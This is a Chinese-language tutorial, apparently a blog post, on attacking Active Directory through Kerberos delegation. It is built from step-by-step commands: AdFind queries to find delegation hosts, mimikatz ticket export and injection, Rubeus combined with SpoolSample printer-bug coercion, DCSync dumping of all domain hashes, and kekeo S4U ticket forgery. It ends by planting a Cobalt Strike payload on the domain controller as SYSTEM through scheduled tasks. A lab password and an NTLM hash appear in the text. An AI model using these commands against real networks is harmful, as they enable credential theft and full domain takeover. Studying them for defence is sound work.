域内安全：委派攻击

目录

域委派

非約束性委派攻击：

主动访问：

被动访问（利用打印机漏洞）

约束性委派攻击：

域委派

域委派是指将域内用户的权限委派给服务账户，使得服务账号能够以用户的权限在域内展开活动。 委派是域中的一种安全设置，可以允许某个机器上的服务代表某个用户去执行某个操作，主要分为三 种：

1、非约束性委派

2、约束性委派

3、基于资源的约束性委派

委派攻击：

只能在域管上面设置委派

分为非约束性委派和约束性委派

在域内，只有主机账号和服务账号才能设置委派

主机账号：就是AD中的computer组内的计算机，就是加入域的计算机，也叫机器账号

服务账号：只是用来跑服务的，不能用来登录电脑，只是一个服务

非約束性委派攻击：

目的：如何让域管访问配置了非约束性委派的机器，如果域管访问了，那么就拿到了域管的TGT

从攻击角度来说：如果攻击者拿到了一台配置了非约束委派的机器权限，可以诱导管理员来访问该机器，然后可以得到管理员的TGT，从而模拟管理员访问任意服务，相当于拿下了整个域环境，或者结合打印机漏洞让域管用户强制回连以缓存 TGT，一个域内用户访问WEB服务，但是一些资源在文件服务上，这个时候就需要委派，需要web系统代表用户A去访问文件服务的资源

实验前提：控制了域内的一台机器，并且该机器的服务账号配置了非约束委派，

主动访问：

1、使用Adfind查询域内非约束委派机器账号

AdFind.exe -b "DC=hack,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

2、我们先去访问域控，是不能访问的：

dir \\dc.hack.com\c$

3、这个时候如果域管访问了机器我们的内存中就会有域管的TGT，就可以访问任意机器了，在与域控上执行访问(在域控上执行)

主动访问：

net use \\PC-2008.HACK.COM /user:hack\administrator Qq123456

4、导出内存中的票据：

sekurlsa::tickets /export

5.注入票据：

mimikatz kerberos::ptt [0;54acdf]-2-0-60a10000-Administrator@krbtgtHACK.COM.kirbi

6.访问域控：

shell dir \\dc.hack.com\c$

7.如果成功，计划任务上线CS：

copy cs.exe \\dc.hack.com\C$

shell schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\cs.exe /ru system /f

shell schtasks /run /s dc.hack.com /i /tn "test"

成功上线：

被动访问（利用打印机漏洞）

一般域管不会主动访问我们，我们可以 利用 Windows 打印系统远程协议（MS-RPRN）中的一种旧的但是默认启用的方法，在该方法中，域用户可以使用 MS-RPRN 方法强制任何运行了 Spooler 服务的计算机以通过 Kerberos 或 NTLM 对攻击者选择的目标进行身份验证，使DC强制访问设置了非约束性委派的机器或者服务

利用：

先关闭防火墙

1、首先利用Rubeus在 机器上以本地管理员权限执行以下命令，每隔一秒监听来自域控机器 DC 的登录信息

Rubeus.exe monitor /interval:1 /filteruser: DC$

2.再利用SpoolSample强制域控打印机回连，需在域用户进程上执行，所以这里切换成了普通域用户帐号去执行

SpoolSample.exe DC OA

3.Rubeus监听到票据，会得到来自域控的TGT票据：

4.导入票据：

Rubeus.exe ptt /ticket:票据

5.获取域内用户哈希：

lsadump::dcsync /all /csv

5.如果当前的用户是管理员就可以使用PTH攻击，如果是普通的域用户就使用黄金票据

使用计划任务，服务，或者无文件的powershell上线

copy 123.exe \\dc.hack.com\C$

shell schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\123.exe /ru system /f

shell schtasks /run /s dc.hack.com /i /tn "test"

约束性委派攻击：

1、S4u2self（Service for User to Self）

2、S4U2proxy（Service for User to Proxy）

这两个扩展都允许服务代表用户从KDC请求票证。

约束委派限制了S4U2proxy协议的请求范围，使得配置了委派属性的服务只能模拟用户身份访问特定的其他服务

攻击流程：

用户（A）访问WEB系统（B）,B代表A去向KDC申请访问B的TGT和ST1(使用S4u2self),用户A拿到了ST1就可以访问B了，如果在B上配置了约束性委派（A到C的约束委派），则B能够使用S4U2Proxy协议将用户发给自己的可转发的ST1票据以用户的身份发给KDC,KDC返回B一个访问C的票据ST2，这样B就可以以用户的身份访问C

实验前提：我们已经控制了电脑，发现该电脑配置了约束性的委派，并且可以读取到该电脑的机器用户的HASH值

我们现在域控上面配置约束性委派

先上线域内配置了约束性委派的机器

1、查询约束性委派的机器和用户

查询约束委派机器账户

AdFind.exe -b "DC=hack,DC=com" -f "(&(samAccountType=805306369)(msdsallowedtodelegateto=*))" msds-allowedtodelegateto

2、使用mimikatz获取机器账户NTLM Hash：

mimikatz sekurlsa::logonpasswords

3、使用kekeo申请配置了约束委派机器账户2012-1$的TGT：

kekeo "tgt::ask /user:PC-ZS$ /NTLM:e018eb59a33bfed210afac21977d9d41 /domain:hack.com" "exit"

4.利用TGT通过伪造请求以administrator身份访问dc.hack.com的ST

shell kekeo "tgs::s4u /tgt:TGT_2012-1$@HACK.COM_krbtgt~hack.com@HACK.COM.kirbi /user:Administrator@hack.com /service:cifs/dc.hack.com" "exit"

5.mimkatz注入：

mimikatz kerberos::ptt TGS_Administrator@hack.com@HACK.COM_cifs~dc.hack.com@HACK.COM.kirbi

访问域控：

shel dir \\dc.hack.com\c$

注意：约束性委派，是否能成功控制域控，取决于委派了什么服务